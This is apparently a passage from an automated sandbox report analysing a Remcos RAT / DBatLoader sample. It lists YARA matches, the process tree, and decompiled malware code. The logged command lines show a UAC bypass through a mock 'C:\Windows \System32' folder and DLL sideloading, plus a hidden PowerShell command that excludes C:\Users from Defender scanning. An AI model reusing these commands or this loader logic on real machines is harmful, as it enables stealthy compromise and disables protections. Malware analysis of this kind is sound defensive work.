5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 2e 38 37 34 34 0a 7d Data Ascii: { "geoplugin_request":"102.129.143.30", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Hunenberg", "geoplugin_region":"Zug", "geoplugin_regionCode":"ZG", "geoplugin_regionName":"Zug", "geoplugin_areaCode":"", "geoplugin_dmaCode":"", "geoplugin_countryCode":"CH", "geoplugin_countryName":"Switzerland", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"EU", "geoplugin_continentName":"Europe", "geoplugin_latitude":"47.173", "geoplugin_longitude":"8.4204", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"Europe\/Zurich", "geoplugin_currencyCode":"CHF", "geoplugin_currencySymbol":"CHF", "geoplugin_currencySymbol_UTF8":"CHF", "geoplugin_currencyConverter":0.8744}

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: tTIYCp2sf4.exePID: 7068, Parent PID: 3528

General

Target ID:	0
Start time:	18:13:56
Start date:	04/08/2023
Path:	C:\Users\user\Desktop\tTIYCp2sf4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\tTIYCp2sf4.exe
Imagebase:	0x400000
File size:	1'113'600 bytes
MD5 hash:	AE5AD2EFD8A9CF25AD9EB00EBE24EB92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000003.553019316.000000007EA30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.557425300.000000007EBD0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6332, Parent PID: 7068

General

Target ID:	2
Start time:	18:14:01
Start date:	04/08/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\GjwyghlfO.bat" "
Imagebase:	0xd90000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6336, Parent PID: 6332

General

Target ID:	3
Start time:	18:14:01
Start date:	04/08/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6304, Parent PID: 6332

General

Target ID:	4
Start time:	18:14:02
Start date:	04/08/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Imagebase:	0xd90000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: xcopy.exePID: 3616, Parent PID: 6332

General

Target ID:	5
Start time:	18:14:02
Start date:	04/08/2023
Path:	C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit):	true
Commandline:	xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
Imagebase:	0x13a0000
File size:	44'544 bytes
MD5 hash:	9F3712DDC0D7FE3D75B8A06C6EE8E68C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3112, Parent PID: 6332

General

Target ID:	6
Start time:	18:14:02
Start date:	04/08/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Imagebase:	0xd90000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: xcopy.exePID: 6468, Parent PID: 6332

General

Target ID:	8
Start time:	18:14:02
Start date:	04/08/2023
Path:	C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit):	true
Commandline:	xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
Imagebase:	0x13a0000
File size:	44'544 bytes
MD5 hash:	9F3712DDC0D7FE3D75B8A06C6EE8E68C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6620, Parent PID: 6332

General

Target ID:	9
Start time:	18:14:03
Start date:	04/08/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Imagebase:	0xd90000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: xcopy.exePID: 6616, Parent PID: 6332

General

Target ID:	10
Start time:	18:14:03
Start date:	04/08/2023
Path:	C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit):	true
Commandline:	xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y
Imagebase:	0x13a0000
File size:	44'544 bytes
MD5 hash:	9F3712DDC0D7FE3D75B8A06C6EE8E68C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: easinvoker.exePID: 6552, Parent PID: 6332

General

Target ID:	11
Start time:	18:14:03
Start date:	04/08/2023
Path:	C:\Windows \System32\easinvoker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows \System32\easinvoker.exe
Imagebase:	0x7ff780540000
File size:	131'648 bytes
MD5 hash:	231CE1E1D7D98B44371FFFF407D68B59
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6576, Parent PID: 6552

General

Target ID:	12
Start time:	18:14:03
Start date:	04/08/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
Imagebase:	0x7ff632260000
File size:	273'920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6556, Parent PID: 6576

General

Target ID:	13
Start time:	18:14:03
Start date:	04/08/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 2404, Parent PID: 6576

General

Target ID:	14
Start time:	18:14:04
Start date:	04/08/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Imagebase:	0x7ff722d20000
File size:	447'488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Analysis Process: PING.EXEPID: 1332, Parent PID: 6332

General

Target ID:	15
Start time:	18:14:04
Start date:	04/08/2023
Path:	C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):	true
Commandline:	ping 127.0.0.1 -n 6
Imagebase:	0xc00000
File size:	18'944 bytes
MD5 hash:	70C24A306F768936563ABDADB9CA9108
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2164, Parent PID: 2404

General

Target ID:	16
Start time:	18:14:04
Start date:	04/08/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: flhgywjG.batPID: 4028, Parent PID: 7068

General

Target ID:	17
Start time:	18:14:06
Start date:	04/08/2023
Path:	C:\Users\Public\Libraries\flhgywjG.bat
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\flhgywjG.bat
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1053880782.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.1053773362.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 4%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: Gjwyghlf.PIFPID: 6936, Parent PID: 3528

General

Target ID:	19
Start time:	18:14:10
Start date:	04/08/2023
Path:	C:\Users\Public\Libraries\Gjwyghlf.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Gjwyghlf.PIF"
Imagebase:	0x400000
File size:	1'113'600 bytes
MD5 hash:	AE5AD2EFD8A9CF25AD9EB00EBE24EB92
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: C:\Users\Public\Libraries\Gjwyghlf.PIF, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: flhgywjG.batPID: 6572, Parent PID: 6936

General

Target ID:	20
Start time:	18:14:15
Start date:	04/08/2023
Path:	C:\Users\Public\Libraries\flhgywjG.bat
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\flhgywjG.bat
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.571086194.0000000000557000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000002.570996676.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: Gjwyghlf.PIFPID: 4396, Parent PID: 3528

General

Target ID:	21
Start time:	18:14:19
Start date:	04/08/2023
Path:	C:\Users\Public\Libraries\Gjwyghlf.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Gjwyghlf.PIF"
Imagebase:	0x400000
File size:	1'113'600 bytes
MD5 hash:	AE5AD2EFD8A9CF25AD9EB00EBE24EB92
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi

Show Windows behavior

Chronological Activities

Analysis Process: flhgywjG.batPID: 6888, Parent PID: 4396

General

Target ID:	22
Start time:	18:14:22
Start date:	04/08/2023
Path:	C:\Users\Public\Libraries\flhgywjG.bat
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\flhgywjG.bat
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.586128217.0000000000647000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000016.00000002.585995743.0000000000400000.00000004.00000400.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: tTIYCp2sf4.exePID: 7068, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	12.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.4%
Total number of Nodes:	2000
Total number of Limit Nodes:	26

Executed Functions

Function 02869D28 Relevance: 36.8, APIs: 10, Strings: 10, Instructions: 1750
nativethreadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E02869D28(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				char _v68;
				char _v72;
				char _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				char _v104;
				char _v108;
				intOrPtr _v112;
				char _v116;
				char _v120;
				char _v124;
				intOrPtr _v128;
				char _v132;
				char _v136;
				char _v140;
				intOrPtr _v144;
				char _v148;
				char _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				intOrPtr _v180;
				char _v184;
				char _v188;
				char _v192;
				intOrPtr _v196;
				char _v200;
				char _v204;
				char _v208;
				intOrPtr _v212;
				char _v216;
				char _v220;
				char _v224;
				intOrPtr _v228;
				char _v232;
				char _v236;
				char _v240;
				intOrPtr _v244;
				char _v248;
				char _v252;
				char _v256;
				intOrPtr _v260;
				char _v264;
				char _v268;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v284;
				char _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				char _v332;
				char _v336;
				intOrPtr _v340;
				char _v344;
				char _v348;
				char _v352;
				intOrPtr _v356;
				char _v360;
				char _v364;
				char _v368;
				intOrPtr _v372;
				char _v376;
				char _v380;
				char _v384;
				intOrPtr _v388;
				char _v392;
				char _v396;
				char _v400;
				intOrPtr _v404;
				char _v408;
				char _v412;
				char _v416;
				intOrPtr _v420;
				char _v424;
				char _v428;
				char _v432;
				intOrPtr _v436;
				char _v440;
				char _v444;
				char _v448;
				intOrPtr _v452;
				char _v456;
				char _v460;
				char _v464;
				intOrPtr _v468;
				char _v472;
				char _v476;
				char _v480;
				intOrPtr _v484;
				char _v488;
				char _v492;
				char _v496;
				intOrPtr _v500;
				char _v504;
				char _v508;
				char _v512;
				intOrPtr _v516;
				char _v520;
				char _v524;
				char _v528;
				intOrPtr _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr _v548;
				char _v552;
				char _v556;
				char _v560;
				intOrPtr _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v584;
				char _v588;
				char _v592;
				intOrPtr _v596;
				char _v600;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				char _v620;
				char _v624;
				intOrPtr _v628;
				char _v632;
				char _v636;
				char _v640;
				intOrPtr _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				char _v664;
				char _v668;
				char _v672;
				intOrPtr _v676;
				char _v680;
				char _v684;
				char _v688;
				intOrPtr _v692;
				char _v696;
				char _v700;
				char _v704;
				intOrPtr _v708;
				char _v712;
				char _v716;
				char _v720;
				intOrPtr _v724;
				char _v728;
				char _v732;
				char _v736;
				intOrPtr _v740;
				char _v744;
				char _v748;
				char _v752;
				intOrPtr _v756;
				char _v760;
				char _v764;
				char _v768;
				intOrPtr _v772;
				char _v776;
				char _v780;
				char _v784;
				intOrPtr _v788;
				char _v792;
				char _v796;
				char _v800;
				intOrPtr _v804;
				char _v808;
				char _v812;
				char _v816;
				intOrPtr _v820;
				char _v824;
				char _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				char _v844;
				char _v848;
				intOrPtr _v852;
				char _v856;
				char _v860;
				char _v864;
				intOrPtr _v868;
				char _v872;
				char _v876;
				char _v880;
				intOrPtr _v884;
				char _v888;
				char _v892;
				char _v896;
				intOrPtr _v900;
				char _v904;
				char _v908;
				char _v912;
				intOrPtr _v916;
				char _v920;
				char _v924;
				char _v928;
				intOrPtr _v932;
				char _v936;
				char _v940;
				char _v944;
				intOrPtr _v948;
				char _v952;
				char _v956;
				char _v960;
				intOrPtr _v964;
				char _v968;
				char _v972;
				short* _t596;
				intOrPtr _t607;
				intOrPtr* _t610;
				WCHAR* _t670;
				void* _t671;
				int _t672;
				struct _EXCEPTION_RECORD _t701;
				struct _EXCEPTION_RECORD _t745;
				HANDLE* _t746;
				void* _t790;
				int _t791;
				intOrPtr _t820;
				void* _t822;
				intOrPtr _t824;
				intOrPtr _t868;
				intOrPtr _t870;
				void* _t872;
				void _t873;
				intOrPtr _t918;
				intOrPtr _t990;
				void* _t992;
				void* _t993;
				intOrPtr _t995;
				void _t997;
				void* _t998;
				intOrPtr _t1069;
				void* _t1071;
				intOrPtr _t1143;
				void* _t1174;
				void* _t1246;
				void* _t1279;
				void* _t1281;
				void* _t1283;
				intOrPtr _t1327;
				intOrPtr _t1328;
				intOrPtr _t1330;
				intOrPtr _t1332;
				intOrPtr _t1378;
				void* _t1380;
				long _t1381;
				intOrPtr _t1424;
				void* _t1426;
				void _t1427;
				intOrPtr _t1428;
				intOrPtr _t1430;
				void* _t1432;
				void _t1433;
				void* _t1450;
				void* _t1524;
				void* _t1529;
				void* _t1534;
				void* _t1539;
				void* _t1544;
				void* _t1549;
				intOrPtr _t1550;
				void* _t1559;
				void* _t1564;
				void* _t1569;
				void* _t1574;
				void* _t1580;
				void* _t1585;
				void* _t1591;
				void* _t1596;
				void* _t1601;
				void* _t1606;
				void* _t1611;
				void* _t1616;
				void* _t1621;
				void* _t1626;
				void* _t1631;
				void* _t1636;
				void* _t1641;
				void* _t1646;
				void* _t1651;
				void* _t1656;
				void* _t1661;
				void* _t1666;
				void* _t1671;
				void* _t1676;
				void* _t1681;
				void* _t1686;
				void* _t1691;
				void* _t1696;
				void* _t1701;
				void* _t1706;
				void* _t1711;
				void* _t1716;
				void* _t1721;
				void* _t1726;
				void* _t1731;
				void* _t1736;
				void* _t1741;
				void* _t1746;
				void* _t1751;
				void* _t1756;
				void* _t1761;
				void* _t1766;
				void* _t1772;
				void* _t1777;
				void* _t1785;
				void* _t1790;
				void* _t1795;
				void _t1796;
				void _t1798;
				intOrPtr _t1800;
				void* _t1805;
				void* _t1810;
				void* _t1815;
				void* _t1820;
				void* _t1825;
				void* _t1830;
				void* _t1835;
				intOrPtr _t1840;
				void* _t1841;
				intOrPtr _t1843;
				intOrPtr _t1844;
				void* _t1852;
				void* _t1855;
				void* _t1859;

				_t1859 = __fp0;
				_t1843 = _t1844;
				_t1450 = 0x79;
				do {
					_push(0);
					_push(0);
					_t1450 = _t1450 - 1;
				} while (_t1450 != 0);
				_t1840 = __edx;
				_v8 = __eax;
				E02854954(_v8);
				_push(_t1843);
				_push(0x286ba6b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1844;
				E028544F4(0x28a63d4, 0x286ba84);
				_push(0x286ba90);
				_push( *0x28a63d4);
				_push("OpenSession");
				E02854824();
				E02854698( &_v12, E02854964(_v16));
				_push(_v12);
				E028547B0( &_v24,  *0x28a63d4, 0x286ba90);
				E02854698( &_v20, E02854964(_v24));
				_pop(_t1524); // executed
				E02867B80(_v20, _t1524); // executed
				_push(0x286ba90);
				_push( *0x28a63d4);
				_push("ScanBuffer");
				E02854824();
				E02854698( &_v28, E02854964(_v32));
				_push(_v28);
				E028547B0( &_v40,  *0x28a63d4, 0x286ba90);
				E02854698( &_v36, E02854964(_v40));
				_pop(_t1529); // executed
				E02867B80(_v36, _t1529); // executed
				_push(0x286ba90);
				_push( *0x28a63d4);
				_push("Initialize");
				E02854824();
				E02854698( &_v44, E02854964(_v48));
				_push(_v44);
				E028547B0( &_v56,  *0x28a63d4, 0x286ba90);
				E02854698( &_v52, E02854964(_v56));
				_pop(_t1534); // executed
				E02867B80(_v52, _t1534); // executed
				_push(0x286ba90);
				_push( *0x28a63d4);
				_push("Initialize");
				E02854824();
				E02854698( &_v60, E02854964(_v64));
				_push(_v60);
				E028547B0( &_v72,  *0x28a63d4, 0x286ba90);
				E02854698( &_v68, E02854964(_v72));
				_pop(_t1539); // executed
				E02867B80(_v68, _t1539); // executed
				_push(0x286ba90);
				_push( *0x28a63d4);
				_push("ScanString");
				E02854824();
				E02854698( &_v76, E02854964(_v80));
				_push(_v76);
				E028547B0( &_v88,  *0x28a63d4, 0x286ba90);
				E02854698( &_v84, E02854964(_v88));
				_pop(_t1544); // executed
				E02867B80(_v84, _t1544); // executed
				_push(0x286ba90);
				_push( *0x28a63d4);
				_push("ScanBuffer");
				E02854824();
				E02854698( &_v92, E02854964(_v96));
				_push(_v92);
				E028547B0( &_v104,  *0x28a63d4, 0x286ba90);
				E02854698( &_v100, E02854964(_v104));
				_pop(_t1549); // executed
				E02867B80(_v100, _t1549); // executed
				 *0x28a651c = _t1840;
				_t596 =  *0x28a651c; // 0x7ebd0018
				if( *_t596 != 0x5a4d) {
					L17:
					_pop(_t1550);
					 *[fs:eax] = _t1550;
					_push(0x286ba72);
					E028544C4( &_v972, 0x64);
					E028544C4( &_v572, 0x64);
					E02854C24( &_v172);
					return E028544C4( &_v168, 0x29);
				}
				_push(0);
				_push(_t1840);
				_t607 =  *0x28a651c; // 0x7ebd0018
				_t51 = _t607 + 0x3c; // 0x110
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				 *0x28a6520 =  *_t51 + _v116;
				_t610 =  *0x28a6520; // 0x7ebd0128
				if( *_t610 != 0x4550) {
					goto L17;
				}
				_push(0x286ba90);
				_push( *0x28a63d4);
				_push("UacInitialize");
				E02854824();
				E02854698( &_v108, E02854964(_v112));
				_push(_v108);
				E028547B0( &_v120,  *0x28a63d4, 0x286ba90);
				E02854698( &_v116, E02854964(_v120));
				_pop(_t1559); // executed
				E02867B80(_v116, _t1559); // executed
				_push(0x286ba90);
				_push( *0x28a63d4);
				_push("UacScan");
				E02854824();
				E02854698( &_v124, E02854964(_v128));
				_push(_v124);
				E028547B0( &_v136,  *0x28a63d4, 0x286ba90);
				E02854698( &_v132, E02854964(_v136));
				_pop(_t1564); // executed
				E02867B80(_v132, _t1564); // executed
				_push(0x286ba90);
				_push( *0x28a63d4);
				_push("Initialize");
				E02854824();
				E02854698( &_v140, E02854964(_v144));
				_push(_v140);
				E028547B0( &_v152,  *0x28a63d4, 0x286ba90);
				E02854698( &_v148, E02854964(_v152));
				_pop(_t1569); // executed
				E02867B80(_v148, _t1569); // executed
				_push(0x286ba90);
				_push( *0x28a63d4);
				_push("ScanString");
				E02854824();
				E02854698( &_v156, E02854964(_v160));
				_push(_v156);
				E028547B0( &_v168,  *0x28a63d4, 0x286ba90);
				E02854698( &_v164, E02854964(_v168));
				_pop(_t1574); // executed
				E02867B80(_v164, _t1574); // executed
				E02854DA4( &_v172, _v8);
				_t670 = E02854DB4(_v172);
				_t671 =  *0x28a63dc; // 0x0
				_t672 = CreateProcessAsUserW(_t671, 0, _t670, 0, 0, 0, 4, 0, 0, 0x28a640c, 0x28a63fc); // executed
				if(_t672 != 0) {
					_push(0x286ba90);
					_push( *0x28a63d4);
					_push("ScanBuffer");
					E02854824();
					E02854698( &_v176, E02854964(_v180));
					_push(_v176);
					E028547B0( &_v188,  *0x28a63d4, 0x286ba90);
					E02854698( &_v184, E02854964(_v188));
					_pop(_t1835); // executed
					E02867B80(_v184, _t1835); // executed
				}
				_push(0x286ba90);
				_push( *0x28a63d4);
				_push("UacInitialize");
				E02854824();
				E02854698( &_v192, E02854964(_v196));
				_push(_v192);
				E028547B0( &_v204,  *0x28a63d4, 0x286ba90);
				E02854698( &_v200, E02854964(_v204));
				_pop(_t1580); // executed
				E02867B80(_v200, _t1580); // executed
				_push(0x286ba90);
				_push( *0x28a63d4);
				_push("OpenSession");
				E02854824();
				E02854698( &_v208, E02854964(_v212));
				_push(_v208);
				E028547B0( &_v220,  *0x28a63d4, 0x286ba90);
				E02854698( &_v216, E02854964(_v220));
				_pop(_t1585); // executed
				E02867B80(_v216, _t1585); // executed
				_t701 =  *0x28a2c1c; // 0x28a6324
				E02867AF4(_t701, 0x40, 0, 0, 0);
				_push(0x286ba90);
				_push( *0x28a63d4);
				_push("UacInitialize");
				E02854824();
				E02854698( &_v224, E02854964(_v228));
				_push(_v224);
				E028547B0( &_v236,  *0x28a63d4, 0x286ba90);
				E02854698( &_v232, E02854964(_v236));
				_pop(_t1591); // executed
				E02867B80(_v232, _t1591); // executed
				_push(0x286ba90);
